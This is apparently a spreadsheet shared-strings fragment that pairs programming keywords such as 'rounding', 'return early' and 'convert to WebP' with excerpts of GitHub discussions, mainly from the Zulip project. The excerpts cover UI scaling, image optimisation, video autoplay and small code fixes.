$elem = $(instance.reference); . const edited_notice_str = $elem.attr("data-tippy-content"); . instance.setContent( . parse_html( . render_message_edit_notice_tooltip({ . edited_notice_str, . realm_allow_edit_history: page_params.realm_allow_edit_history, . }), . ), . ); . }, . onHidden(instance) { . instance.destroy(); . }, . }); . ```</t>
  </si>
  <si>
    <t>?** bump[s to second line (no parallel edit icon on Today’s tasks) (also in legacy). ## Views. ### Recent conversations. - [x] The lock icons have sizing/alignment issues: #30698. - [x] Status circles should scale up along with the rest of the UI: #30591. - [x] Add horizontal space between the icons and the text, if it's not too much of a rabbit-hole: #30712. ## Sidebars. - [x] Add more space below _Browse NNN more channels_: #30747 . - [x] Add more space below _Invite users to organization_: #30747. - [x] Status circles should scale up along with the rest of the UI: #30591. ### Unread counters. - [x] Counters should scale up along with the rest of the UI: #30616. - [x] Check horizontal as well as vertical spacing of counters. ### Left sidebar. - [x] _More conversations_ and _back to channel_ rows should scale up along with the rest of the UI; likewise _show all topics_: #30632. - [x] Make topic filter into a gridded row: #30632. - [x] Address navigation icon misalignment [at lower resolutions](https://chat.zulip.org/#narrow/stream/9-issues/topic/icons.20sagging.20on.20.60main.60/near/1826275): #30692. ## Message rows. - [x] Adjust space around messages with senders so that it matches the space around senderless messages (too little space at the top, when there's a sender; but note that the situation is different in the presence of reactions. Check also Show more/Show less): #30579. - [x] Correct mention pills to scale up along with rest of the UI: #30590. ## Status emoji. - [x] Status emoji should scale up along with the rest of the UI: #30592. ## Tippy. - [x] Text should scale up along with the rest of the UI: #30711. - [x] Audit `tooltips.css` for hard-coded font-size and line-height values; might require a design discussion. ## Compose Box. - [x] Formatting buttons, possibly others, should scale up with text; breakpoints for showing/hiding may need to be revisited and possibly expressed in `em` units (coordinating with @N-Shar-ma): Draft PR #30671 (Nehal will co</t>
  </si>
  <si>
    <t>##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</si>
  <si>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Not Autoplay</t>
  </si>
  <si>
    <t>HTML Video Does Not Autoplay Mobile Devices; ### What I'm trying to achieve. On my homepage I am trying to feature a video instead of the standard images. Everything works correct except the videos do not autoplay on iPhone/iPad mobile devices even when using muted and playsinline tags. ### Steps to reproduce the problem. ```. &lt;video autoplay loop muted playsinline width="100%" poster="/static/images/***.jpg"&gt;. &lt;source src="/static/images/***.mp4" type="video/mp4"&gt;. Your browser does not support the video tag. &lt;/video&gt;. ```. ### What I expected to happen. The video should autoplay on mobile devices just like it does correctly on a desktop environment. **System information**. Operating system: . Browser: iOS 12 iPhone, iPad - Chrome or Safari. I just tested on Android and it works correctly. After more research I have read that under iOS guidelines they say you must not autostart a video without using the tag playsinline. The video has to be muted or your video clip must not have an audio track. My video is muted and includes playsinline and does not autoplay. I have tried another version of the video without the audio track and it still does not autoplay on mobile devices. I have also turned off low power mode on iPhone/iPad with the same result.</t>
  </si>
  <si>
    <t>not autoplay</t>
  </si>
  <si>
    <t>optimize images</t>
  </si>
  <si>
    <t>optimize images; I want to merge this change because i optimized some images.</t>
  </si>
  <si>
    <t>convert to WebP</t>
  </si>
  <si>
    <t>This works great! ```. INFOS:. ?: PNG thumbnails found, consider running convert_thumbnails to convert to WebP. ```. ```. Conversion to WebP completed. Conversion completed in 3.942s. ```. I think this is the best solution and we can document the change in the release so people can know to run the command. Its perfect "progressive enhancement" IMHO. Even for users who never run the command from now on thumbnails will be webp which should be beneficial. Overall I'm really happy with this!</t>
  </si>
  <si>
    <t>In general, it seems fine to do this. It's a pretty specific set of errors that would need to happen for the file to get moved, but we might as well copy it to a "safe" location for moving. I notice it's still PNG, this feels like a good time to convert to WebP.</t>
  </si>
  <si>
    <t>converting to webp</t>
  </si>
  <si>
    <t>Thanks for your PR ! I'll test that asap. My issue is probably not clear, but I don't need to re-encrypt my files. My use case is the following:. - I have an old version of paperless with mixed encrypted and non-encrypted files. . - I want to use the `decrypt_documents` command to decrypt by files, but it fails because it expects a .webp format for thumbnails. Maybe we could have a simpler solution, for example: . - Skip converting to webp on the first run if at least one thumbnail is encrypted, and tells the user converting is possible only with all files decrypted . - **OR** Try to fallback on `.png.gpg` if `.webp.gpg` thumbnail is not found</t>
  </si>
  <si>
    <t>lazy loading images</t>
  </si>
  <si>
    <t>Lazyload can be implemented independently as long as we are talking about lazy loading images, not preloading images and storing in users device(which is great benefit of using PWA). AFAIK we are serving `manifest.json` but it's not really customized, probably build-in webpack feature. New trend is in inlining critical (above the fold) CSS, which speeds up first paint on the mobile ('Reduce render-blocking stylesheets') - there's no django implementation that's capable of performing it at this moment, however [critical](https://github.com/addyosmani/critical) written in JS works great, would love to see it in Saleor.</t>
  </si>
  <si>
    <t>lazy loads images</t>
  </si>
  <si>
    <t>Thanks for the great effort! I'm trying to mirror my saleor site with `wget -mk https://my-saleor-site`, but wget isn't downloading the images because they're lazy-loaded. Is there any config setting that I can flip to disable lazy loading of images? e.g. a webpage setting such that `npm run build-assets` no longer lazy loads images? Edit 1: Using [this SO answer](https://stackoverflow.com/a/5378926/4126114), I can add a jquery snippet to load all images. Will test it out. ```. $('img.lazyload').each(function() {. $(this).attr("src", $(this).attr("data-src"));. });. ```. Edit 2: added nginx substitution filter solution in my next comment</t>
  </si>
  <si>
    <t>optimized images</t>
  </si>
  <si>
    <t>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![image](https://user-images.githubusercontent.com/5421321/66198635-21a18c00-e69d-11e9-958b-d76f762b5a8d.png). While on the product details page this images looks rather fine:. ![image](https://user-images.githubusercontent.com/5421321/66198742-5ca3bf80-e69d-11e9-90ce-f67eba16b789.png). I'm only wondering if this optimization won't make it worse for the thumbnails.</t>
  </si>
  <si>
    <t>to be able to create a group for each customer and scope it to just the sites where they have service. That would ideally include being able to assign a tenant to the VLAN group, as you can with just the VLAN itself today, but I understand that would be a separate FR. As we may have multiple customers receiving service at a given site, being able to include it in multiple groups would be needed to support this model. The implementation of #9627 would make this use case even better. Today we have tried just assigning a VLAN group to an entire market (using the Region model), but that has caused issues for customers with long haul circuits and we occasionally run into duplicate IDs being used for separate L2 domains within the same market, so they cannot be put into the same group. We have a similar scenario with just internal departments where different groups of sites mean different things to different teams and they may not always be grouped the same. For example, the teams that serve a given site may have different service areas and would each want to create a group for just the sites that they support. If this feature is implemented, then it would also be nice to be able to assign a tenant to a site group to be able to help distinguish them and to be able to use within permissions (like you can only view or edit sites that are part of a group that belongs to the tenant for your department). Except for the VLAN group scoping use case, I think the rest can be implemented through the use of custom fields to represent the relationships between objects, but I've found that it provides for a poor and often confusing user experience to try to explain using the similarly named custom fields and not the core model fields for what a user is trying to do, especially when the custom fields are below the fold. Hiding the core fields hasn't been a viable option, as they are still required to support the inbuilt functionality of things like VLAN group scoping in some scenarios.</t>
  </si>
  <si>
    <t>n UI. * [#8201](https://github.com/netbox-community/netbox/issues/8201) - Custom integer fields should allow negative integers as minimum/maximum values. ---. ## v3.1.3 (2021-12-29).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t>
  </si>
  <si>
    <t>Convert to webp</t>
  </si>
  <si>
    <t>converted to webp</t>
  </si>
  <si>
    <t>GIVEN: Encrypted documents exist with PNG thumbnail WHEN: Migration is attempted THEN: Thumbnails are converted to webp &amp; re-encrypted</t>
  </si>
  <si>
    <t>reduced motion</t>
  </si>
  <si>
    <t>Does this device prefer reduced motion? Returns `null` server-side.</t>
  </si>
  <si>
    <t>Reduced Motion</t>
  </si>
  <si>
    <t>A hook that returns `true` if we should be using reduced motion based on the current device's Reduced Motion setting. This can be used to implement changes to your UI based on Reduced Motion. For instance, replacing motion-sickness inducing `x`/`y` animations with `opacity`, disabling the autoplay of background videos, or turning off parallax motion. It will actively respond to changes and re-render your components with the latest setting. ```jsx export function Sidebar({ isOpen }) { const shouldReduceMotion = useReducedMotion() const closedX = shouldReduceMotion ? 0 : "-100%" return ( &lt;motion.div animate={{ opacity: isOpen ? 1 : 0, x: isOpen ? 0 : closedX }} /&gt; ) } ``` @return boolean @public</t>
  </si>
  <si>
    <t>background videos</t>
  </si>
  <si>
    <t>reduce motion</t>
  </si>
  <si>
    <t>Make animation instant if this is a transform prop and we should reduce motion.</t>
  </si>
  <si>
    <t>deferring rendering</t>
  </si>
  <si>
    <t>If we currently have exiting children, and we're deferring rendering incoming children until after all current children have exiting, empty the childrenToRender array</t>
  </si>
  <si>
    <t>rounding</t>
  </si>
  <si>
    <t>It looks like there are a couple of issues. First, [Ubuntu's Python packages have a bug](https://bugs.launchpad.net/ubuntu/+source/python3.4/+bug/1500768) that caused problems with me installing the build dependencies. I'm not familiar with the PPA system, so I don't know if this is causing problems or not. Second, the unit tests fail, due to floating point rounding issues:. ```. F.......................F................................................................................. ======================================================================. FAIL: test_decimalDecodeTest (__main__.UltraJSONTests). ----------------------------------------------------------------------. Traceback (most recent call last):. File "tests/tests.py", line 93, in test_decimalDecodeTest. self.assertNotEqual(sut, decoded). AssertionError: {u'a': 4.56} == {u'a': 4.56}. ======================================================================. FAIL: test_decodeFloatingPointAdditionalTests (__main__.UltraJSONTests). ----------------------------------------------------------------------. Traceback (most recent call last):. File "tests/tests.py", line 912, in test_decodeFloatingPointAdditionalTests. self.assertEquals(-1.7893, ujson.loads("-1.7893")). AssertionError: -1.7893 != -1.7893000000000001. ----------------------------------------------------------------------. Ran 106 tests in 0.568s. ```. This is apparently a [known issue](https://github.com/esnme/ultrajson/issues/178). Disabling tests completely is probably overkill, so I guess the best solution would be to patch the test suite to either skip those tests or test for approximate instead of exact equality.</t>
  </si>
  <si>
    <t>already sorted</t>
  </si>
  <si>
    <t>@kevv87, left some more feedback. I think you still need to take care of the syntactic changes. I would also suggest that you change the `exports.sort_recipients` function like this:. ```JavaScript. exports.sort_recipients = function (matches, query) {. var name_results = prefix_sort(query, matches, function (x) { return x.full_name; });. var email_results = prefix_sort(query, name_results.rest, function (x) { return x.email; });. var matches_sorted_by_relevance = exports.sort_by_relevance(&lt;objects&gt;); . var matches_sorted_by_pms = exports.sort_by_pms(&lt;objects which are not already sorted&gt;)); . var rest_sorted_by_pms = exports.sort_by_pms(email_results.rest); . var result = matches_sorted_by_relevance.concat(matches_sorted_by_pms);. return result.concat(rest_sorted_by_pms);. }; . ```. So basically, now you will have first few elements of the list sorted by relevance and the rest sorted by pms.</t>
  </si>
  <si>
    <t>short circuiting</t>
  </si>
  <si>
    <t>So the scope of this ticket is basically steps 1-5 above (see Tim's message), which I'll summarize:. * add new DB fields. * write zerver.lib.messages.add_missing_messages (w/tests). * invoke add_missing_message when user returns. * have do_send_messages do short circuiting. * think about digest emails. I'll split out the later steps to another ticket.</t>
  </si>
  <si>
    <t>Merged, after adding this `overflow:hidden` to fix that the original version of this change lost the rounding of corners on the avatars:. ```. .inline_profile_picture {. display: inline-block;. width: 35px;. height: 35px;. margin-right: 11px;. - background-size: 35px 35px;. vertical-align: top;. border-radius: 4px;. + overflow: hidden;. }. ```</t>
  </si>
  <si>
    <t>Return early</t>
  </si>
  <si>
    <t>Cool, I merged a couple early commits. I think the "login-page: Return early if resp is a redirect." commit is wrong; `template_response` isn't set in that case. EDIT: I see the issue, it's redirects coming from `django_login_view`.</t>
  </si>
  <si>
    <t>Rounding</t>
  </si>
  <si>
    <t>@gnprice I was looking at [PEP 484](https://www.python.org/dev/peps/pep-0484/). &gt; One thing to check is whether we can move Travis to testing on Xenial; I'm emailing their support team. The option to use 16.04 instead of 14.04 is actually there, see https://travis-ci.org/rht/zulip/jobs/281554811. &gt; Investigate whether there's a way to use the new syntax with Python 3.4 somehow. &gt; OK, I think the next step should be to try migrating 1 small file to use the new syntax, and make sure everything happily passes in CI and it runs in production (we can test-deploy on chat.zulip.org) to find any issues. As @**Greg Price** had stated, the syntax has actually been introduced since 3.0. Also here is a test which shows that the server worked in 3.4 https://github.com/zulip/zulip/pull/6784. If I were to estimate how long it takes to do the translation manually:. the codebase has `ls **/*.py | wc -l` = 655 python files. Rounding this up to 1k to include the case of files without the .py extension. If each files takes 5 human-minute. Then it takes 3.4 human-days to manually do all of the tasks. This can be useful as a first-time contribution project. -- Or, how should the script be written?</t>
  </si>
  <si>
    <t>return early</t>
  </si>
  <si>
    <t>Yeah, for Digest emails, I'd only have it runs for the first two, and have the rest return early.</t>
  </si>
  <si>
    <t>@zulipbot claim. Right now I have implemented this. `message.pub_date = timezone_now() - timezone_timedelta(days = 100 - num_messages, hours = random.randint(0, 23), minutes = random.randint(0, 59))`. Rather than create a new variable, I have reused num_messages to chronologically increase time, so the first spoofed message might be posted 3 months ago, the second 2 months and 27 days, etc. Right now I use 100 days back because that is around the maximum of num_messages. I can decrease it to 7 days or so by dividing num_messages and then rounding to a whole number, if it'd be better to not go 100 days back. . Looks like this. ![screenshot from 2018-02-10 22-46-18](https://user-images.githubusercontent.com/15152698/36069371-37085c9c-0eb6-11e8-8fee-70841187cf0e.png).</t>
  </si>
  <si>
    <t>This looks great. I squashed the first and third commits (the second commit was actually independent of the rest), and merged this. . I assume the muting cases you talk about at the bottom of the test file would have better results if we eventually added `use_closest` type rounding logic? .</t>
  </si>
  <si>
    <t>I could also imagine rounding all four corners of the avatar?</t>
  </si>
  <si>
    <t>For both typeahead use cases, here's what I think we need to do:. * Change `topic_data.get_server_history` to not go the server if we've already done so at least once in this browser session (it can instead just call the `on_success` function in that case). I think the right way to do this is to just add an attribute to the structure returned by `exports.topic_history`, called `has_server_history`, which is set to true ocne `get_server_history` has been run, and check that in the `get_server_history` code path. * Have the typeahead code path(s) call the updated `topic_data.get_server_history` when it starts typeahead for topics within a stream. Depending how the typeahead works (I just don't know), the design may vary a bit. If the typeahead re-queries the `topic_data` structures every time someone types a character, then we might need nothing for the `on_success` handler other than loading indicator management (if we choose to show one). If the topic data is copied into data structures accessed a different way, we might need something more complex. For manually testing this efficiently, I think if we disable the `exports.add_message` code path in `topic_data.js` to just return early, topic data will ONLY include data from the `get_server_history` code path, which should make it easy to see the updated code path in action. (The other reasonable option is to hack the backend to add an extra topic to what is returned that isn't present in the message history, so that topic is only available via this query).</t>
  </si>
  <si>
    <t>@adnrs96 Looking at your comments, I see that you noticed that there's a few differences between our previous hex-to-HSL conversions and the one I did here; it's probably due to a different rounding mechanism (I rounded to the nearest integer). Should I change my current values to match the previous values, or change the previous values to match mine? About the selectors; the script I used potentially replaces selectors due to the nature of the regex (example: `#account_label` might turn into `hsl(184, 24% 74)ount_label`); I was just asking you to review the changes so that nothing of this sort happened :)</t>
  </si>
  <si>
    <t>, I had a base value of 150 ms, which is what I used for the topic edits:. https://github.com/zulip/zulip/blob/62f90c1b31951e193be74539ad0660929b58c241/static/js/message_list.js#L318-L319. https://github.com/zulip/zulip/blob/62f90c1b31951e193be74539ad0660929b58c241/static/js/message_list.js#L324-L325. but then, for the message edits themselves, I wanted to also add in a slight fade effect that made it smoother to see the text change (in addition to having the boxes close and open smoothly). I decided by trying different values that 25 ms was appropriate for this. as such, in the segment bellow, I wanted the box-opening to be about 150 ms after the text disappeared, but it would look weird to have these be one after the other, so I made the slideDown last 150ms + 25ms and let them start simultaneously. https://github.com/zulip/zulip/blob/62f90c1b31951e193be74539ad0660929b58c241/static/js/message_list.js#L305-L306. Similarly, bellow there should be 25 ms of fade in should after the box closes, so I used 25ms + 150ms and let them start simultaneously. https://github.com/zulip/zulip/blob/62f90c1b31951e193be74539ad0660929b58c241/static/js/message_list.js#L311-L312. That leaves the strange value of 112 and 125 bellow. The problem here is that when we've successfully edited the message content, the text is updated by by the "blue flash" type of animation which triggers for everyone and not just the user that made the edit. Now, the gap between how long before that actually happens varies (not sure if this would depend on network speed or some other factor), but I found that if we use a duration of 125 ms, we can almost close the edit box before the "flash" triggers every time. I then halved the 25ms fade duration to 12.5ms (this is for unedited text appearing, and possibly this is important in case of edit failure). I got 112ms by rounding down 125ms - 12.5ms. . https://github.com/zulip/zulip/blob/62f90c1b31951e193be74539ad0660929b58c241/static/js/message_edit.js#L179-L180</t>
  </si>
  <si>
    <t>@pragatiagrawal31 thanks for the updated version of this. The "save changes" behavior now feels basically correct (though I think we want 800ms, not 500ms, for how long it stays before disappearing). However, I don't understand the changes to what happens when you click "discard" -- your new behavior feels confusing to me. . Having played with options a bit, I think what we want to have happen when you click "discard" is both "Save changes" and "discard" disappear together (probably immediately, without a fade at all, but fading together might be OK). I also think it was more readable to have all the calls go through `exports.change_save_button_state` rather than having a separate "discard" function; we can just have the "discard" case return early if we don't want it to run the final `show_hide_element` code. . Can you clean that up @pragatiagrawal31? . @rishig FYI in case you have thoughts on whether we fade out the buttons over 300msor just disappear immediately when you click "discard".</t>
  </si>
  <si>
    <t>About being able to indicate to the backend that the current message being sent is to be scheduled I think you can pretty much use most of the infra on the front end we have for the slash commands. If you look at reminder.js you will find a function called schedule_message() which basically either gets a `request` passed to it as a parameter or it creates one. `request` over here is actually a message object containing all the message details. You will get it when you see the function body. . Right now this function is called from compose.finish() which is basically a way of short circuiting the routing message send workflow in case of slash commands. What you could do is that popover basically sets somewhere in a variable if the message is to be sent immediately or to be scheduled and for what time. Using that you can change the action on send button or Enter key. From here you can create the message object as usual and basically add an additional line in front of the content of the message. This line will basically be the slash command using the format `/schedule &lt;delivery time&gt;` and pass it on to reminder.schedule_message() which can then handle everything as it did for the slash commands. Of course this is just a general idea about how we use the infra already in place. Feel free to ping me if you need to discuss this :)</t>
  </si>
  <si>
    <t>memoize</t>
  </si>
  <si>
    <t>Remaining uses of `_` after #13830, #13840, #13850, #13860:. ```. 13 _.isEqual. 11 _.sortBy. 11 _.range. 9 _.throttle. 8 _.last. 6 _.without. 5 _.pick. 5 _.first. 5 _.debounce. 5 _.chain. 4 _.times. 4 _.difference. 3 _.uniqueId. 3 _.uniq. 2 _.partial. 2 _.initial. 1 _.zip. 1 _.union. 1 _.template. 1 _.shuffle. 1 _.rest. 1 _.once. 1 _.memoize. 1 _.findLastIndex. ```</t>
  </si>
  <si>
    <t>temporary variable</t>
  </si>
  <si>
    <t>lip$ git grep 'email = self.example'. zerver/lib/test_classes.py: email = self.example_user_map[name]. zerver/tests/test_auth_backends.py: email = self.example_email('hamlet'). zerver/tests/test_auth_backends.py: email = self.example_email('hamlet'). zerver/tests/test_auth_backends.py: user_email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zerver/tests/test_presence.py: email = self.example_email("othello").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zerver/tests/test_users.py: email = self.example_email("hamlet"). ```. I'm guessing most of those should be using `self.example_user` or `user_profile.email` instead of making an extra temporary variable.</t>
  </si>
  <si>
    <t>Epsilon</t>
  </si>
  <si>
    <t>Don't have time right now to create mockups / screenshots; but I'll try to give an example... Let's assume these are the messages (**_bold italic_** means selected):. 1. Alpha. 2. Beta. 3. Gamma. 4. Delta. 5. Epsilon. 6. Zeta. We CTRL+LEFT_CLICK 1. and we get:. 1. **_Alpha_**. 2. Beta. 3. Gamma. 4. Delta. 5. Epsilon. 6. Zeta. At this point, having selected something, we also get a panel above the message input one with contents:. &gt; Move to new topic: [ TheStream ] [ New topic title ]. (Press ENTER and the selected messages are moved to this new topic.). (The panel persists until we e.g., press ENTER, ESC, or click on not-a-message.). We CTRL+LEFT_CLICK 3. and we get:. 1. **_Alpha_**. 2. Beta. 3. **_Gamma_**. 4. Delta. 5. Epsilon. 6. Zeta. We SHIFT+LEFT_CLICK 5. and we get:. 1. **_Alpha_**. 2. Beta. 3. **_Gamma_**. 4. **_Delta_**. 5. **_Epsilon_**. 6. Zeta. Selected messages would be rendered with some light background or something.</t>
  </si>
  <si>
    <t>returns early</t>
  </si>
  <si>
    <t>@MSurfer20 This change does not fix this issue as we already call `stream_list.update_streams_sidebar` in `stream_list.rename_stream` after the stream rename event is sent by the server. The actual issue here is that `update_streams_sidebar` returns early because the list of stream ids actually does not change on stream rename unless the sorted order of stream changes. I have explained this a bit more [here](https://chat.zulip.org/#narrow/stream/6-frontend/topic/Renaming.20a.20stream/near/971097).</t>
  </si>
  <si>
    <t>short circuit</t>
  </si>
  <si>
    <t>@jeremy160189 you can likely work around this as follows:. ```. diff --git a/zerver/lib/soft_deactivation.py b/zerver/lib/soft_deactivation.py. index f6f2aa45e3..4e45b11c6e 100644. --- a/zerver/lib/soft_deactivation.py. +++ b/zerver/lib/soft_deactivation.py. @@ -164,7 +164,8 @@ def add_missing_messages(user_profile: UserProfile) -&gt; None:. recipient_ids = []. for sub in all_stream_subs:. stream_subscription_logs = all_stream_subscription_logs[sub['recipient__type_id']]. - if stream_subscription_logs[-1].event_type == RealmAuditLog.SUBSCRIPTION_DEACTIVATED:. + if (len(stream_subscription_logs) &gt; 0 and. + stream_subscription_logs[-1].event_type == RealmAuditLog.SUBSCRIPTION_DEACTIVATED):. assert stream_subscription_logs[-1].event_last_message_id is not None. if stream_subscription_logs[-1].event_last_message_id &lt;= user_profile.last_active_message_id:. # We are going to short circuit this iteration as its no use. ```. Did you import your data from another tool like Slack or HipChat? That situation shouldn't be possible (as at least one RealmAuditLog entry is generated when subscribing in the first place); we'll likely want to fix the root bug that is likely present in our data import tools and add a migration to fix up anomalies like this. But the change above should solve your problem without any problematic side effects. @mateuszmandera FYI.</t>
  </si>
  <si>
    <t>@amanagr Where did you get those colors? The logo gradient is `#50adff` to `#7877fc`, which is further than a rounding error from the ones you quoted. Did you screenshot it and use a color picker? That’s a lossy operation. Look at the code instead:. https://github.com/zulip/zulip/blob/00c493a75addb85d715bb4fd97b90faeca2b7976/static/images/logo/zulip-org-logo.svg#L1. But none of these colors were intended to be used as a background color for text. Indeed, the WCAG contrast ratio of `#ffffff` on `#50adff` is [2.39:1](https://webaim.org/resources/contrastchecker/?fcolor=FFFFFF&amp;bcolor=50ADFF), which is even worse than the existing ratio of [2.53:1](https://webaim.org/resources/contrastchecker/?fcolor=FFFFFF&amp;bcolor=68B190) for `#ffffff` on `hsl(153, 32%, 55%)` = `#68b190`. Additionally, @Signior-X your screenshot shows a *very* different purple `#893bf5` than the `hsl(238, 86%, 71%)` = `#757af5` in the code. I’m not sure whether your browser actually showed that to you or your screenshot tool assumed a crazy color space (there’s no evidence of that in the image metadata, at least).</t>
  </si>
  <si>
    <t>tolerance</t>
  </si>
  <si>
    <t>@kbuzzard thanks for the report! I recognize your name from back when I was planning to be a number theorist :). Let me explain what's going on; it's a bit of a subtle issue that's causing this and it's one of our few server-side exceptions we regularly see in production. I'm tagging this as a priority because it's not acceptable that we haven't invested in fixing this yet (in general we aim for a zero-tolerance policy for server-side exceptions in production, but this one has escaped proper attention). * For anti-abuse/DoS reasons, we have a maximum message size that's I think 10k characters of raw input and 100k characters of output. . * The way we do LaTeX rendering currently involving running KaTeX on the server side. This can be valuable for avoiding slow rendering on the frontend (i.e. running KaTeX at display time); I haven't recently tested how slow KaTeX is, but my believe is that rendering hundreds messages containing a decent amount of math to display a view might take several seconds leading to a bad UX. Needs verification. * KaTeX explodes math content by a factor that's closer to 100 than 10, and as a result if you write a message that's close to our 10k character limit, it's likely to be like 500k characters of rendered markdown output, and thus be rejected as likely a DoS attempt. * Because even messages with a lot of math have a lot of text, and text doesn't explode significantly in rendering, whether this happens to you depends on these totally invisible properties like how much math there is and how KaTeX turns math into a bunch of little CSS classes. * I would have thought that the failure mode here would be that the message content got saved as a draft; if that's not the case that's a separate bug with error handling that we should split out and investigate. Here are some thoughts on how we could fix this:. * We could change that 100k limit; I'm a bit reluctant to do that unless we have a new number that we think is safely small enough. Or maybe</t>
  </si>
  <si>
    <t>I agree the rounding is a nice touch! How did you pick the rounding parameters? Ideally, we'd use the same settings we use for these widgets elsewhere in the app.</t>
  </si>
  <si>
    <t>I pushed backed here with just these changes to the "settings: Use save-discard widget in realm-level defaults section." section above, which I think addresses all comments and also deduplicates `register_save_discard_widget_handlers`. ```. diff --git a/static/js/settings_display.js b/static/js/settings_display.js. index 5c1d8b6086..2281bdfd8e 100644. --- a/static/js/settings_display.js. +++ b/static/js/settings_display.js. @@ -69,6 +69,8 @@ export function set_up(settings_panel) {. .prop("checked", true);. . if (for_realm_settings) {. + // For the realm-level defaults page, we use the common. + // settings_org.js handlers, so we can return early here. return;. }. . @@ -76,6 +78,8 @@ export function set_up(settings_panel) {. overlays.close_modal(language_modal_elem);. });. . + // Common handler for sending requests to the server when an input. + // element is changed. const all_display_settings = settings_config.get_all_display_settings();. for (const setting of all_display_settings.settings.user_display_settings) {. container.find(`.${CSS.escape(setting)}`).on("change", function () {. diff --git a/static/js/settings_notifications.js b/static/js/settings_notifications.js. index f1acf6b94b..1736a77116 100644. --- a/static/js/settings_notifications.js. +++ b/static/js/settings_notifications.js. @@ -134,9 +134,13 @@ export function set_up(settings_panel) {. set_enable_digest_emails_visibility(settings_panel);. . if (for_realm_settings) {. + // For the realm-level defaults page, we use the common. + // settings_org.js handlers, so we can return early here. return;. }. . + // Common handler for sending requests to the server when an input. + // element is changed. container.find(".notification-settings-form").on("change", "input, select", function (e) {. e.preventDefault();. e.stopPropagation();. @@ -154,6 +158,10 @@ export function set_up(settings_panel) {. );. });. . + // This final patch of settings are ones for which we. + // intentionally don't let organization admi</t>
  </si>
  <si>
    <t>@johanehinger the test checks you've added don't validate all the details I'd like to validate. I've pushed an extra commit that attempts to address this; but the test doesn't pass, I think because of some problem with the mocking not applying correctly (as demonstrated by the print statements, we're not actually seeing the configuration link generation code running with the mocked time I selected; if they were, the difference in days would be exactly 10, not the 9.999 rounding down to 9 that we see)</t>
  </si>
  <si>
    <t>For sorting the columns, I think it's fine to open an issue for it. I'm not 100% sure it's worth the complexity, since the name column is already sorted. Sorting the email column is a no-op for some users on some realms (due to hidden emails), but it's probably fine if it just feels strange. Sorting by id is kinda strange. And then the action column has all the same buttons. So we'd need to be a bit thoughtful here.</t>
  </si>
  <si>
    <t>Since the last update, I fixed an issue with the puppeteer tests relevant to using the update linkifier modal with an invalid URL template, that accidentally fails the `clean()` check before the intended validator check. `RealmFilter.clean` was updated to return early when the URL template is invalid to begin with. Regarding error handling for creating linkifiers, there is something that we can work on in the future. - Instead of having validators defined on `url_template` field and `clean()` for `RealmFilter`, it might be better to just do the checks in `clean` and get rid of the validator. Because `clean()` relies on `url_template` being valid. - Currently, we just raise a `ValiadtionError` saying that the "Invalid URL template.` without a more specific reason. We can try to look at the specific error being raised and give a more actionable error message. For now, I don't want to expand the scope of this PR too much, so better error handling can be a separate task to follow up.</t>
  </si>
  <si>
    <t>&gt; I think you missed [this comment](https://github.com/zulip/zulip/pull/24334/commits/6f338c553e58cf66093c7eebd2e4231737fee20f#r1136938349) for tests. There is neither a reply nor any changes in the PR. My bad. Thank you for pointing it out. The reason I didn't have the function was because it's not being called. The function which is being tested returns early. I've improved it now by ensuring that the early return works correctly and the other functions are not called. Can you take a look now?</t>
  </si>
  <si>
    <t>Updates in the recent push:. * Rounding the borders of the focus outline for the X button and updates on styling for the outline to not overlap nearby elements. * Updated the tab keypress commit to be custom for search. * Added a new commit `typeahead: Don't act on blurs that change focus within the parentElement.` that stops Tab from closing the searchbox, and some blur/keydown handlers elsewhere to ensure that Tab from the close button does still close the searchbox. * Simplified `close_search_bar_and_open_narrow_description` and moved the logic to avoid the narrowing dropdown visual jump to its callsite -- this code is still in the temp commit at the end of this PR . * Added the border top to the typeahead</t>
  </si>
  <si>
    <t>roundings</t>
  </si>
  <si>
    <t>Sorry but we shouldn't do a smaller to get focus right:. &lt;img width="380" alt="image" src="https://github.com/zulip/zulip/assets/1903309/2959d171-c13d-4760-9ccd-b8aed504e1eb"&gt;. We should control outline-offset. and default browser focus would have a proper roundings. Right now the focus isn't browser's default and a item is smaller. Such menu items are possible but we are not going for those:. &lt;img width="586" alt="image" src="https://github.com/zulip/zulip/assets/1903309/a8b0a7c5-5b5b-4f68-a241-1f90487b048e"&gt;. I'm not agains custom outlines but it is a big deal, so let use them only when we really need it. I removed margin from `a` and `border-radius` and tuned the styles like that:. &lt;img width="914" alt="image" src="https://github.com/zulip/zulip/assets/1903309/81a6ff0c-cdb2-43bb-9316-9541ae0f5db3"&gt;. There are places where explicit outline from links should be removed and focus should be replaced with focus-visible. &lt;img width="669" alt="image" src="https://github.com/zulip/zulip/assets/1903309/279c42f9-30d5-4b9b-ac4f-ece80c1bb6bb"&gt;. &lt;img width="681" alt="image" src="https://github.com/zulip/zulip/assets/1903309/bf0e7565-421d-4311-b03a-e41abbfb842b"&gt;. Correction: outline-offset could be just -1px. Result:. ![CleanShot 2023-10-05 at 09 59 45](https://github.com/zulip/zulip/assets/1903309/a15687ba-70e2-4a5b-9738-a876827898dd). Sorry but general background isn't good for stroke around the circle:. &lt;img width="130" alt="image" src="https://github.com/zulip/zulip/assets/1903309/3371457d-08ab-4bbf-a4bc-6f3c2a06f9bf"&gt;. Lets figure out how can we control that... it could be a css variable on the parent level which would be redefined and by default it could be background of the app but in some cased we could override it like in menu and other places. Time isn't a clickable element but now its not possible to select it. It is not a big deal but only clickable elements shouldn't allow the selection. I would like to suggest some design tune for hover and active elements of th</t>
  </si>
  <si>
    <t>How does the rounding function work? We might want to play with it (e.g., I think I'd prefer 1.5K to 1K for 1509 users), but that should definitely be a separate follow-up. &lt;img width="189" alt="Screenshot 2023-11-19 at 10 47 03 PM" src="https://github.com/zulip/zulip/assets/2090066/33bdb31f-0e68-4079-9fb4-c2ac544c6084"&gt;.</t>
  </si>
  <si>
    <t>This implicitly changes the meaning of `stream_bar.decorate`:. https://github.com/zulip/zulip/blob/07e99eace94c99ea417b4bd49aaf6eba6ba77ffb/web/src/stream_bar.js#L7-L13. Previously we’d call `stream_data.get_color("")` and end up setting `background-color` to `DEFAULT_COLOR`, but now we return early for `undefined` and don’t change `background-color` at all. Is that intended?</t>
  </si>
  <si>
    <t>guard clause</t>
  </si>
  <si>
    <t>Thank you for catching that bug; I was also able to reproduce the same a few moments ago. I have added appropriate comments to the new function and updated the code slightly to match the logic in the surrounding functions. (change conditional to guard clause)</t>
  </si>
  <si>
    <t>As I observed in the previous PR opened for this issue, the flat picker applies rounding without notifying us. I couldn’t find a variable that holds the exact minute value before rounding. We only receive the time value from the flat picker after it has already been rounded.</t>
  </si>
  <si>
